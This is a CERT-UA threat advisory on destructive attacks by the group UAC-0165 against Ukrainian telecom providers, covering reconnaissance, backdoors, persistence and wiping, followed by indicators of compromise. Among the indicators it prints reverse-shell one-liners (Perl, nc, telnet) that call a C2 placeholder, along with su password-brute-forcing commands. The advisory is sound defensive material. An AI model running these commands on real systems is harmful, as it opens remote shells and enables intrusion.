Людям із порушенням зору

CERT-UA
Computer Emergency Response Team of Ukraine

Про CERT-UA Новини Рекомендації Зв'яжіться з нами Контакти     Пошук  In English

Main News Peculiarities of destructive cyber attacks a…

Peculiarities of destructive cyber attacks against

Ukrainian providers (CERT-UA#7627)

 15.10.2023 INTEL

general information За темою «Intel»

According to public sources, for the period from 11.05.2023 to 27.09.2023, an
 22.05.2023
organized group of criminals tracked by the identifier UAC-0165 interfered with the
information and communication systems (ICS) of no less than 11 telecommunications Шпигунська активність UAC-0063 у
providers of Ukraine, which, among other things, led to to interruptions in the відношенні України, Казахстану,
provision of services to consumers. Киргизстану, Монголії, Ізраїлю, Індії
(CERT-UA#6549)
The Government Computer Emergency Response Team of Ukraine CERT-UA, in
close cooperation with the specialists of one of the providers, took steps to
 29.04.2023
investigate the incident, thanks to which the circumstances of the cyberattacks
WinRAR як "кіберзброя".
were established, the characteristic tactics, techniques and procedures of the
Деструктивна кібератака UAC-0165
attackers were clarified, and the malicious plan regarding implementation of cyber
(ймовірно, Sandworm) на держсектор
threats at a number of similar enterprises.
України із застосуванням RoarBat
In the conditions of relentless digitization of a significant number of spheres of (CERT-UA#6550)
modern life, taking into account the persistent threat of loss of communication as a
result of kinetic attacks on telecommunications and energy supply facilities, the  27.01.2023

sustainable functioning of operators and providers is a socially important need.

Кібератака на інформаційно-
In order to repel aggression in cyberspace, we call on Ukrainian providers to review комунікаційну систему Укрінформ
their own attack surfaces, take into account the technical details outlined and, in (CERT-UA#5850)
case of detection (signs) of information security incidents, immediately contact
CERT-UA in order to initiate response measures.  17.01.2020

It should be taken into account that the incident, properly investigated, increases Intel, Adobe, Oracle та VMWare
the probability of preventing the implementation of cyber threats on other objects опублікували перші, в цьому році,
of our state. оновлення безпеки для своїх
продуктів.
Summary (not exhaustive) information on the specifics of cyber attacks on
Ukrainian providers is given below.  17.01.2020

Перші цьогорічні оновлення безпеки

Technical information Intel, Adobe, Oracle та VMWare

As a rule, the first stage of a cyberattack is intelligence, which begins with a "rough" Більше новин 
scan of the provider's subnets (autonomous system) using a typical set of network
ports using, in particular, masscan. An example of the applied configuration file, as
well as a script for starting masscan is shown in Fig. 1-2, respectively. 

  

Fig.1 Example of masscan configuration file

Fig. 2 Example of a script for launching masscan with a list of typical network ports
(conf.txt)

In the case of identification of management interfaces (for example, SSH, RDP),

provided that access to the latter is not restricted, selection of authentication data is
initiated. If signs of vulnerabilities are detected, their exploitation is carried out.
Publicly available services (web applications), such as billing, the user's personal
account, hosting servers (and websites), etc., are analyzed using specialized
programs, including: ffuf, dirbuster, gowitness, nmap , etc.

It should be noted (!) that reconnaissance and exploitation activity is carried out
from previously compromised servers located, in particular, in the Ukrainian
segment of the Internet. Dante, socks5 and other proxy servers are used to route
traffic through such nodes .

A detailed analysis of the servers used as a bridgehead for cyber-attacks allowed us

to confirm the fact of their early compromise. In addition, additional signs of such
compromise have been identified.

1. Usually, which is also true for hosting servers, attackers install a malicious PAM
module (tracked as POEMGATE), which provides the ability to authenticate with a
statically defined password and saves logins and passwords entered during
authentication in a file in XOR-encoded form (Fig. .3). Such backdoors are installed
in advance and, over time, make it possible to obtain up-to-date authentication data
of administrators, which, in turn, are often used to access other server and network
equipment.
  

Fig.3 Example of decompiled POEMGATE software code

2. In order to bypass settings related to limiting the ability to use the command shell
(shell), the original files "/bin/false", "/bin/nologin" are replaced by "bash".

3. Removal of signs of unauthorized access is achieved, among other things, by

running the WHITECAT utility.

4. Additionally, a version of the POSEIDON program ("/lib/x86_64-linux-

gnu/libs.so") can be installed on the server, the functionality of which includes a
full range of remote computer control tools. At the same time, the persistence of
POSEIDON is ensured by replacing (modifying) the legitimate binary file
"/usr/sbin/cron", in the structure of which is added the program code that creates a
stream with an argument (start_routine) in the form of the "RunMain" function,
which is imported from "libc .so" (Fig. 4):
  

Fig. 4 An example of the modified cron code for calling "RunMain" in order to
launch POSEIDON

In the case of a hosting service provider, after the website has been compromised,
the Weevely backdoor may be downloaded to the web server. If the server is
within the provider's ICS (and has "internal" interfaces), it can be used to develop
an attack on other elements of the DMZ and/or local computer network.

In addition to specialized programs, persistent unauthorized access to the provider's

infrastructure is implemented using regular VPN accounts (this is facilitated by the
absence of multi-factor authentication based on a one-time code from the
application). An obvious sign of VPN compromise is connecting from IP addresses
of the TOR network and VPN services, including those "classified" as Ukrainian.

After penetrating the ICS, the main efforts are focused on the identification of so-
called jump hosts and computers of system administrators. If further horizontal
movement is prevented by the access control lists of the network equipment,
attackers can make changes to their settings.

Since since the days of "KyberBerkut" almost every hack has been accompanied by
the publication of "proofs", part of the time is devoted to the exfiltration of
documents, drawings, schemes, contracts. Occasionally, to enhance the "effect"
and provide greater publicity, attackers resort to stealing passwords from official
accounts in Telegram, Facebook, as well as tokens for sending SMS, etc. Therefore,
special attention should be paid to securing such "media" accounts by setting up
multi-factor authentication.

At the final stage of a cyber attack, active network and server equipment, as well as  
data storage systems are disabled. This is facilitated by the use of the same
passwords and unlimited access to the control interfaces of this equipment. In
addition, the lack of backup copies of current configurations negatively affects the
possibility of prompt recovery. An example of one of the destructor scripts is
shown in Fig. 5.

Fig. 5 Example of a destructor script

As an example, the appropriate functionality of scripts and scheduled tasks can be

used to disrupt the standard operating mode of Mikrotik equipment. An example of
one of the scripts is shown in Fig. 6.

Fig. 6 An example of a script and task for Mikrotik

We strongly recommend that you take into account the information presented in
the article "How to be responsible and hold the cyber front" (
https://cert.gov.ua/article/5436463 ).

We take this opportunity to express our gratitude to the operators and

telecommunications providers of Ukraine for their assistance in the fight against
cyber threats, and we certify our readiness to involve CERT-UA in investigating
cyber attacks, exchanging information, checking anomalies, etc.

Indicators of cyber threats

Files :
2b88885fb57e28497522238bd8f8befc
8ddd681dd834ab66f6a1c00ba2830717bf845de5639708eb8e8ab795ffd1df5a
ps (SOCKS5)
5d9a661f35d4e136d389bea878c4252f
eb01925836eed1dbd85a8ab9aa05c5c45dc051abaae9e67db3a53489d776b6c2   
pam_unix.so (POEMGATE)
20a07ba71cab0f92c566b31e96fdf0e8
9060ca8e829fc136d1ecd95a5204abb48f3ce5b7339619c5668c7e176dcbb235
pam_unix.so (POEMGATE)
a74dbcae530f52f62cbdcef3dc18feee
e9c5dc9cec95f31cea2eb88cc26a35d29c5f89f23bff6a7cfa1250dec6d5701a
pam_unix.so (POEMGATE)
45fad72d370ff88c5b349cb741cc26ce
8fb3ed6261a2358e0890bfd544e515af232f87d3aef947e09f640da7cc1b89d9
wccrt (WHITECAT)
59f2c3f6e4baf721c02a66179147241a
0e24a1268212a790bc3993750f194ac1e0996a6770b32b498341f06abac45d81
libs.so (POSEIDON)
75cde685cd3f00f354155e3c433698c7
e4cff7071e184e3f1bfedfe30afa52ddd2cac1a00983508d142e51ecebfcba14
.1
61b70767326387f141a18e2fbb250a68
b5ec1d43462a770d207eefb906516631e4d80eea55779509616b58b39a764455
script.txt
302f158ca6f6094e90bd43f7748dd65f
65c880f2a3833898c54d7f48ee0709a13887376b2ea5bc933b2e70f29614e728
scan.sh

Network:
eurotelle[.]com
(IP addresses used for SSH/VPN access)
103[.]251.167.20
103[.]251.167.21
104[.]244.72.8   
107[.]189.30.69
139[.]99.237.205
146[.]59.233.33
146[.]59.35.246
156[.]146.63.139
158[.]118.218.193
162[.]247.73.192
162[.]247.74.201
162[.]247.74.206
162[.]247.74.216
162[.]247.74.27
162[.]247.74.74
167[.]86.94.107
171[.]25.193.20
171[.]25.193.235
171[.]25.193.25
171[.]25.193.77
171[.]25.193.78
179[.]43.159.195
179[.]43.159.198
182[.]118.218.193
185[.]100.86.121
185[.]100.87.41
185[.]129.61.129
185[.]129.61.7
185[.]129.62.62
185[.]130.47.58
185[.]14.28.207
185[.]165.169.239
185[.]220.101.152
185[.]220.102.240
185[.]220.102.241
185[.]220.102.242
185[.]220.102.247
185[.]220.102.251
185[.]220.102.252
185[.]220.102.253
185[.]220.102.254
185[.]220.102.8
185[.]220.103.8
185[.]233.100.23
185[.]235.146.29
185[.]241.208.206
185[.]241.208.232
185[.]246.188.60
185[.]246.188.67
185[.]246.188.74
185[.]254.75.55
185[.]34.33.2
185[.]56.83.83
185[.]67.82.114
192[.]42.116.13
192[.]42.116.16
192[.]42.116.18
192[.]42.116.23
192[.]42.116.25
193[.]218.118.158
193[.]218.118.182
195[.]69.202.145
203[.]28.246.189
204[.]28.48.77
204[.]8.156.142
217[.]12.208.73   
23[.]129.64.133
2[.]56.164.52
2[.]58.56.101
45[.]139.122.241
45[.]141.215.111
45[.]154.98.225
46[.]182.21.248
51[.]89.153.112
5[.]181.80.132
5[.]252.118.19
5[.]255.99.205
5[.]45.73.243
62[.]102.148.68
62[.]182.84.146
77[.]48.28.204
77[.]48.28.236
79[.]137.194.146
80[.]67.167.81
82[.]221.128.191
84[.]239.46.144
89[.]147.111.106
89[.]248.165.181
91[.]208.75.153
91[.]208.75.3
91[.]224.92.110
94[.]102.51.15
95[.]214.234.139
95[.]214.55.43

Hosts:

/lib/libc.so.7
/lib/x86_64-linux-gnu/libs.so
/lib/x86_64-linux-gnu/security/pam_unix.so
/tmp/.1
/usr/sbin/wccrt
/usr/sbin/wcc
/var/lib/vim‍
/ps
/var/lib/vim‍
/vfth/scan.sh
expect -c 'spawn su -c "whoami" "%user%"; expect -re "assword";
send "%password%"; expect eof;' 2>&1
perl -e 'use
Socket;$i="%C2IP%";$p=3333;socket(S,PF_INET,SOCK_STREAM,getprotob
yname("tcp"));if(connect(S,sockaddr_in($p,inet_aton( $i))))
{open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/b
in/sh -i");} ;' 2>&1
python -c 'import pexpect as p,sys;c=p.spawn("su %user% -c
whoami");c.expect(".*assword:");c.sendline("r3b3iFv4r3b3iFv4");i
=c.expect([p.EOF,p.TIMEOUT]);sys.stdout.write(c.before[3:] if
i!=p.TIMEOUT else "")' 2>&1
sleep 1; nc -e /bin/sh %C2IP% 3333 2>&1
sleep 1;rm -rf /tmp/backpipe;mknod /tmp/backpipe p;telnet %C2IP%
3333 0</tmp/backpipe | /bin/sh 1>/tmp/backpipe 2>&1
/bin/false (integrity violation/substitution)
/bin/nologin (порушення цілісності/підміна)
/usr/sbin/cron (порушення цілісності/підміна)

 Попередня
Нарощування темпів UAC-
0006, мільйонні збитки
(CERT-UA#7648, CERT-
UA#7688, CERT-UA#7699,
CERT-UA#7705)   

Email
ПІДПИСАТИСЯ
?

E-mail
ПІДПИСАТИСЯ

Контакти Ми в соцмережах

 cert@cert.gov.ua   

Повідомити про інцидент CERT-UA PGP keys:

 incidents@cert.gov.ua  cert@cert.gov.ua

 Пн - Чт: 8:00 - 17:00, Пт: 8:00 - 15:45: PGP key id: 0x7E9B1C7E4B1A77B0

 +38 (044) 281-88-25 PGP fingerprint:

 +38 (044) 281-88-05 566AF34DA63411A0D81F3EC27E9B1C7E4B1A77B0

 Вихідні та святкові дні (цілодобово):  no-reply@cert.gov.ua

 +38 (044) 281-88-01 PGP key id: 0x9C47515761616C35

PGP fingerprint:
Центр антивірусного захисту інформації:
EEBC3EB66DD42CE5C3922D0D9C47515761616C35
 +38 (044) 281-88-78
 incidents@cert.gov.ua
 https://cazi.gov.ua
PGP key id: 0x15207EFFA55AA144
 cazi@scpc.gov.ua
PGP fingerprint:

Для ЗМІ: 9312E8000C81FE8F1D94579C15207EFFA55AA144

 +38 (044) 281-94-96

 press@cip.gov.ua
 Сайт працює в тестовому режимі. Зауваження та
пропозиції надсилайте на cert@cert.gov.ua
Адреса

 03110, Київ, вул. Солом’янська 13

ПОВІДОМТЕ НАС ПРО КІБЕРІНЦИДЕНТ

© 2023 CERT-UA функціонує в складі Держспецзв’язку